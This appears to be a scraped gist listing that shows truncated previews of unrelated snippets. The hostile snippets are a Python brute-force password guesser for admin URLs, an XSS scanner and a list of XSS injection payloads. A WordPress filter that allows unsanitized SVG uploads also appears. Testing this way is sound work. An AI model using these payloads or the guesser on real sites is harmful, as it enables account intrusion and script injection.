This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1033edge.com | |
11mail.com | |
123.com | |
123box.net | |
123india.com | |
123mail.cl | |
123qwe.co.uk | |
150ml.com | |
15meg4free.com | |
163.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var resizeTimer; | |
var timeoutInterval = 100; // Timeout interval for resize timer | |
window.onresize = function(event) { | |
var status = document.getElementById("status"); | |
// ON RESIZING | |
status.innerHTML = "Resizing..."; | |
clearTimeout(resizeTimer); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
body { | |
background: #000000; | |
} | |
#dots { | |
position: absolute; | |
top: 50%; | |
left: 50%; | |
margin-top: -95px; | |
margin-left: -375px; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Enable SVG mime-type | |
*/ | |
add_filter('upload_mimes', function($mimes){ | |
$mimes['svg'] = 'image/svg+xml'; | |
return $mimes; | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import itertools | |
import string | |
import urllib2 | |
def guess_admin_url(url, prefix): | |
adminurl = url + prefix | |
chars = string.ascii_lowercase + string.digits | |
attempts = 0 | |
for password_length in range(1, 9): | |
for guess in itertools.product(chars, repeat=password_length): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import argparse | |
import sys | |
from bs4 import BeautifulSoup as bs | |
from urllib.parse import urljoin | |
""" Prepare arguments for script parse """ | |
parser = argparse.ArgumentParser(description="Detect if target is vulnerable to XSS!?") | |
parser.add_argument('-u', dest='url', type=str, help="Target URL") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>alert(123)</script> | |
<script>alert('123');</script> | |
<img src=x onerror=alert(123) /> | |
<svg><script>123<1>alert(123)</script> | |
"><script>alert(123)</script> | |
'><script>alert(123)</script> | |
><script>alert(123)</script> | |
</script><script>alert(123)</script> | |
< / script >< script >alert(123)< / script > | |
onfocus=JaVaSCript:alert(123) autofocus |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
UPDATE wp_options SET option_value = replace(option_value, 'http://www.oldurl', 'http://www.newurl') WHERE option_name = 'home' OR option_name = 'siteurl'; | |
UPDATE wp_posts SET guid = replace(guid, 'http://www.oldurl','http://www.newurl'); | |
UPDATE wp_posts SET post_content = replace(post_content, 'http://www.oldurl', 'http://www.newurl'); | |
UPDATE wp_postmeta SET meta_value = replace(meta_value,'http://www.oldurl','http://www.newurl'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Which domain? | |
get_domain(){ | |
printf "\n" | |
read -p "Domain: " DOMAIN | |
} | |
# Is domain set? | |
domain_is_set(){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Use --force to skip "usage" errors | |
gcloud services disable --project <project_id> $(gcloud services list --enabled --project <project_id> --format="value(NAME)") |
OlderNewer